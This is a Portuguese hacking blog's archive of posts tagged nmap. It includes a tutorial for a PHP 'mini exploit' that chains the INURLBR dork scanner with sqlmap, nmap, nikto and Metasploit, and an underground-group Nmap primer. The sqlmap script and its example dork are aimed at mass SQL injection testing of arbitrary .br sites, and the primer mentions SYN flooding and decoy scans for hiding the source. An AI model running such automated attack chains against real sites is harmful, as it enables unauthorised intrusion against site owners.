Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador nmap. Mostrar todas as postagens
Mostrando postagens com marcador nmap. Mostrar todas as postagens

segunda-feira, 16 de março de 2015

Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.
  1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
  2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.
Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.
  • Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
  • Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.
Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;


?>


Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:
Comando INURLBR: Se deseja usar filtro em motores de busca: ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"  Execução:
Comando executado:
./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:
$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command$dados);
$command = "nikto -h {$target}";
system($command$dados).empty($dados[0]) ? exit() : NULL;


Exemplo usando msfcli do metasploit  - Hunting For MSSQL:
$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";
system($command$dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed


Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.


BAIXAR SCRIPT SCANNER INURLBR


REF'S:
hunting for MSSQL

msfcli-basics tutorial

msfcli provides a powerful command-line interface to the framework.

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

quarta-feira, 27 de novembro de 2013

Guia de Referência do Nmap (Página do Manual)


Guia de Referência do Nmap (Página do Manual)


O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

A saída do Nmap é uma lista de alvos escaneados, com informações adicionais de cada um dependendo das opções utilizadas. Uma informação chave é a “tabela de portas interessantes”. Essa tabela lista o número da porta e o protocolo, o nome do serviço e o estado. O estado pode ser aberto (open), filtrado (filtered), fechado (closed), ou não-filtrado (unfilterd). Aberto (open) significa que uma aplicação na máquina-alvo está escutando as conexões/pacotes naquela porta. Filtrado (filtered) significa que o firewall, filtro ou outro obstáculo de rede está bloqueando a porta de forma que o Nmap não consegue dizer se ela está aberta (open) ou fechada (closed). Portas fechadas (closed)não possuem uma aplicação escutando nelas, embora possam abrir a qualquer instante. Portas são classificadas como não filtradas (unfiltered)quando elas respondem às sondagens do Nmap, mas o Nmap não consegue determinar se as portas estão abertas ou fechadas. O Nmap reporta as combinações aberta|filtrada (open|filtered)e fechada|filtrada (closed|filtered)quando não consegue determinar qual dos dois estados descrevem melhor a porta. A tabela de portas também pode incluir detalhes de versão de software quando a detecção de versão for solicitada. Quando um scan do protocolo IP é solicitado (-sO), o Nmap fornece informações dos protocolos IP suportados ao invés de portas que estejam abertas.

Além da tabela de portas interessantes, o Nmap pode fornecer informações adicionais sobre os alvos, incluíndo nomes de DNS reverso, possível sistema operacional, tipos de dispositivos e endereços MAC.

Um scan típico do Nmap é mostrado em Example 1, “Uma amostra de scan do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A, para habilitar a detecção de SO e a versão, -T4 para execução mais rápida, e os hostnames de dois alvos.
::::Guia de Referência::::
Notas da Tradução
Sumário das Opções
Especificação de Alvo
Descoberta de Hosts
Fundamentos do Escaneamento de Portas
Técnicas de Escaneamento de Portas
Especificação de Portas e Ordem de Scan
Detecção de Serviço e Versão
Detecção de SO
Temporização (Timing) e Desempenho
Evitando e enganando o Firewall/IDS
Saída (Output)
Opções Diversas (Miscelânea)
Interação em Tempo de Execução
Exemplos
Bugs
Autor

Dominando Nmap Scripting Engine.

Dominando Nmap Scripting Engine.

• NSE Intro & Usage
• Large-scale Scan #1: SMB/MSRPC
• Large-scale Scan #2: Favicon
• Writing NSE Scripts
• Live Script Writing Demo
• Nmap News
• Final Notes & Q/A.

http://nmap.org/presentations/BHDC10/Fyodor-David-BlackHatUSA-2010-Slides.pdf

terça-feira, 11 de setembro de 2012

Manual básico do NMAP

Manual básico do NMAP


=======================================================================================
Manual básico do NMAP
=======================================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
EBR Web Hacking - Sux w-rm - Darkside Group.
Brazilian underground groups :]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

Author: Samuz1n Colz1n
Contact: samuzin[at]hotmail.com.br
Thank`s: shadow vds e kernel
Greetz: ebr web hacking

-=[Descrição]=-

O Nmap fornece, de uma maneira geral, a relação de computadores e serviços
ativos. Este paper irá explicar como instalar e utilizar algumas funções do Nmap.

-=[Alguns métodos de Varredura]=-

-sP : (Ping Scan) Para saber se um determinado host ou rede está no ar. O nmap pode enviar pacotes ICMP (echo request) para verificar se determinado host ou rede está ativa. Hoje em dia, existem muitos filtros que rejeitam os pacotes ICMP, então ele retorna com um pacote de flag contendo TCP ACK para a porta 80(padrão) e caso receba um RST o alvo está ativo. A terceira técnica envia um pacote SYN ( Pedido de conexão) e espera um RST(resposta) ou um SYN-ACK.

Comentário : Podemos também usar o nmap para um ataque de negaça, usar o nmap para um "SYN FLOOD".

-sR : RCP Scan ! Ele considera todas as portas TCP e UDP abertas e envia comando NULL, para determinar se realmente são portas RPC. É como se o comando "rpcinfo -p" estivesse sendo utilizado, mesmo através de um firewall.

-sS : TCP SYN scan: Técnica também conhecida por "half-open" (no inglês, half é como se fosse meio ou meia.) pois não abre uma conexão TCP completa. É enviado um pacote SYN, como se ele fosse uma conexão real e aguarda uma resposta. Caso o pacote SYN-ACK seja recebido, a porta está aberta, enquanto um como resposta indica que a porta está fechada. A vantagem dessa abortagem é que poucos irão detectar esse scanning.

-sT : TCP connect scan: Técnica básica. É utilizada a chamada de sistema "connect" que envia um sinal de portas ativas. É um dos scans mais rápidos, porém fácil de ser detectado.

-sU :UDP scan: Scan para portas UDP, para saber qual está aberta. A técnica consiste em enviar um pacote UDP de 0 byte para cada porta do host. Se for recebido uma mensagem ICMP "port unreachable" então a porta está fechada, senão a porta PODE estar aberta.

-sV: Version detection, muito utilizada. Após as portas TCP e/ou UDP serem descobertas por algum dos métodos, o nmap irá determinar qual o serviço está rodando atualmente. O arquivo nmap-service-probes é utilizado para determinar tipos de protocolos, nome da aplicação, número da versão, etc.

-sF, -sX, -sN
Stealth FIN, Xmas Tree ou Null: Também técnica utilizada para flood. Alguns firewalls e filtros de pacotes detectam pacotes SYN's em portas restritas, então é necessário utilizar métodos avançados para atravessar esse firewall.

FIN : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas ignoram esses pacotes.
Xmas Tree : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas ignoram esse pacote FIN. O pacote contendo as flags FIN, URG e PUSH são utilizados no pacotes FIN que é enviado ao alvo.

Null : Portas fechadas enviam um pacote RST como resposta a pacotes FIN, enquanto portas abertas IGNORAM esses pacotes. Nenhuma flag é ligada no pacote FIN.


-=[Opções Gerais]=-

******************************************
OBS : Em alguns casos ignorar o "<>"
******************************************
-D :
Durante uma varredura, utiliza uma séria de endereços falsificados, simulando que o scanning tenha originado desses vários hosts, sendo praticamente impossível indentificar a verdadeira origem da varreduta.

Ex.: nmap -D IP1,IP2,IP3,IP4,IP6,127.1.1.1

-F : Procura pelas portas que estão no /etc/services. Método mais rápido, porém não procurar todas as portas.

Ex.: nmap -F

-I : Se o host estiver utilizando o ident, é possível identificar o dono dos serviços que estão sendo executados no servidor(trablha com a opção -sT )

Ex.: nmap --sT -i

-O: Ativa a identificação do host remoto via TCP/IP. Irá apresentar versão do Sistema Operacional e tempo ativo.

Ex.: nmap -O

-P : : Específica quas portas devem ser verificados na varredura>

Ex.: nmap -p 22,80,3306,21,8080,134


-T
Esse parâmetro seta a prioridade de varredura do Nmap:


-=[Alguns exemplos]=-

Ex.: nmap -v alvo
Esta opção faz a varredura de todas as portas TCP reservadas.

Ex.: nmap -sS -O alvo/24
Lança uma varredura TCP Syn contra cada máquina que está ativa, abrangendo todas as 255 máquinas de classe “C” onde alvo faz parte. Além disso determina o sistema operacional de cada host.

Ex.: nmap -sX -p 22,53,110,143 alvo
Envia uma varredura Xmas Tree para o alvo, além de varrer somente os serviços
de sshd, Dns, pop3d e imapd.

--=| FIM! |=--